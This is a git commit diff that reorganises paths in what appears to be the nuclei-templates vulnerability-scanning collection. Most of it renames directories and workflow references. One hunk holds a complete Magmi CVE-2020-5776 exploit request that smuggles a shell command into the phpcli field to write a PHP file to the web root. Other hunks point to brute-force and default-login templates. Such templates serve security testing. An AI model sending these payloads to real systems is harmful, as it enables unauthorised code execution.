workflow updates
parent
187e4a5feb
commit
eaaf56e9da
|
@ -22,8 +22,8 @@ vulnerabilities/x-forwarded-host-injection.yaml
|
|||
fuzzing/
|
||||
|
||||
# Wordlist directory contains payload to be used with templates.
|
||||
wordlists/
|
||||
misc/
|
||||
helpers/
|
||||
miscellaneous/
|
||||
|
||||
# Workflows are excluded from default run to avoid duplicate scans.
|
||||
workflows/
|
|
@ -20,7 +20,7 @@ requests:
|
|||
Content-type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
|
||||
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
|
||||
- |
|
||||
POST /magmi/web/magmi_run.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
|
||||
requests:
|
||||
- payloads:
|
||||
data: "payloads/CVE-2020-6287.xml"
|
||||
data: helpers/payloads/CVE-2020-6287.xml
|
||||
raw:
|
||||
- |
|
||||
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
|
||||
|
|
|
@ -2,7 +2,7 @@ id: basic-auth-bruteforce
|
|||
|
||||
info:
|
||||
name: Basic Auth Bruteforce
|
||||
author: "@w4cky_"
|
||||
author: w4cky_
|
||||
severity: high
|
||||
|
||||
# Impotent Notes:-
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
requests:
|
||||
|
||||
- payloads:
|
||||
plugin_wordlist: wordlists/wp-plugins.txt
|
||||
plugin_wordlist: helpers/wordlists/wp-plugins.txt
|
||||
|
||||
# Thanks to RandomRobbieBF for the wordlist
|
||||
# https://github.com/RandomRobbieBF/wordpress-plugin-list
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
|
||||
workflows:
|
||||
|
||||
- template: panels/cisco-asa-panel.yaml
|
||||
- template: exposed-panels/cisco-asa-panel.yaml
|
||||
|
||||
subtemplates:
|
||||
- template: cves/2020/CVE-2020-3187.yaml
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
|
||||
workflows:
|
||||
|
||||
- template: panels/grafana-detect.yaml
|
||||
- template: exposed-panels/grafana-detect.yaml
|
||||
|
||||
subtemplates:
|
||||
- template: default-credentials/grafana-default-credential.yaml
|
||||
- template: default-logins/grafana-default-credential.yaml
|
|
@ -10,7 +10,7 @@ info:
|
|||
|
||||
workflows:
|
||||
|
||||
- template: technologies/jira-detect.yaml
|
||||
- template: exposed-panels/jira-detect.yaml
|
||||
|
||||
subtemplates:
|
||||
- template: cves/2017/CVE-2017-9506.yaml
|
||||
|
@ -23,8 +23,4 @@ workflows:
|
|||
- template: cves/2019/CVE-2019-11581.yaml
|
||||
- template: cves/2020/CVE-2020-14179.yaml
|
||||
- template: cves/2020/CVE-2020-14181.yaml
|
||||
- template: security-misconfiguration/jira-service-desk-signup.yaml
|
||||
- template: security-misconfiguration/jira-unauthenticated-dashboards.yaml
|
||||
- template: security-misconfiguration/jira-unauthenticated-popular-filters.yaml
|
||||
- template: security-misconfiguration/jira-unauthenticated-projects.yaml
|
||||
- template: security-misconfiguration/jira-unauthenticated-user-picker.yaml
|
||||
- template: vulnerabilities/jira/
|
||||
|
|
|
@ -14,4 +14,4 @@ workflows:
|
|||
matchers:
|
||||
- name: mida-eframework
|
||||
subtemplates:
|
||||
- template: vulnerabilities/mida-eframework-xss.yaml
|
||||
- template: vulnerabilities/other/mida-eframework-xss.yaml
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
|
||||
workflows:
|
||||
|
||||
- template: panels/rabbitmq-dashboard.yaml
|
||||
- template: exposed-panels/rabbitmq-dashboard.yaml
|
||||
|
||||
subtemplates:
|
||||
- template: default-credentials/rabbitmq-default-admin.yaml
|
||||
- template: default-logins/rabbitmq-default-admin.yaml
|
|
@ -9,8 +9,8 @@ info:
|
|||
# Old workflows still remains valid, and will be working with all nuclei versions.
|
||||
|
||||
workflows:
|
||||
- template: panels/solarwinds-orion.yaml
|
||||
- template: exposed-panels/solarwinds-orion.yaml
|
||||
subtemplates:
|
||||
- template: cves/2018/CVE-2018-19386.yaml
|
||||
- template: cves/2020/CVE-2020-10148.yaml
|
||||
- template: default-credentials/solarwinds-default-admin.yaml
|
||||
- template: default-logins/solarwinds-default-admin.yaml
|
|
@ -15,5 +15,4 @@ workflows:
|
|||
- template: cves/2018/CVE-2018-1271.yaml
|
||||
- template: cves/2018/CVE-2018-1271.yaml
|
||||
- template: cves/2020/CVE-2020-5410.yaml
|
||||
- template: vulnerabilities/springboot-actuators-jolokia-xxe.yaml
|
||||
- template: vulnerabilities/springboot-h2-db-rce.yaml
|
||||
- template: vulnerabilities/springboot/
|
|
@ -16,17 +16,4 @@ workflows:
|
|||
- template: cves/2019/CVE-2019-15858.yaml
|
||||
- template: cves/2019/CVE-2019-6715.yaml
|
||||
- template: cves/2019/CVE-2019-9978.yaml
|
||||
- template: files/wordpress-db-backup.yaml
|
||||
- template: files/wordpress-debug-log.yaml
|
||||
- template: files/wordpress-directory-listing.yaml
|
||||
- template: files/wordpress-emergency-script.yaml
|
||||
- template: files/wordpress-installer-log.yaml
|
||||
- template: files/wordpress-tmm-db-migrate.yaml
|
||||
- template: files/wordpress-user-enumeration.yaml
|
||||
- template: security-misconfiguration/wordpress-accessible-wpconfig.yaml
|
||||
- template: vulnerabilities/sassy-social-share.yaml
|
||||
- template: vulnerabilities/w3c-total-cache-ssrf.yaml
|
||||
- template: vulnerabilities/wordpress-social-metrics-tracker.yaml
|
||||
- template: vulnerabilities/wordpress-wordfence-xss.yaml
|
||||
- template: vulnerabilities/wordpress-wpcourses-info-disclosure.yaml
|
||||
- template: vulnerabilities/easy-wp-smtp-listing.yaml
|
||||
- template: vulnerabilities/wordpress/
|
||||
|
|
Loading…
Reference in New Issue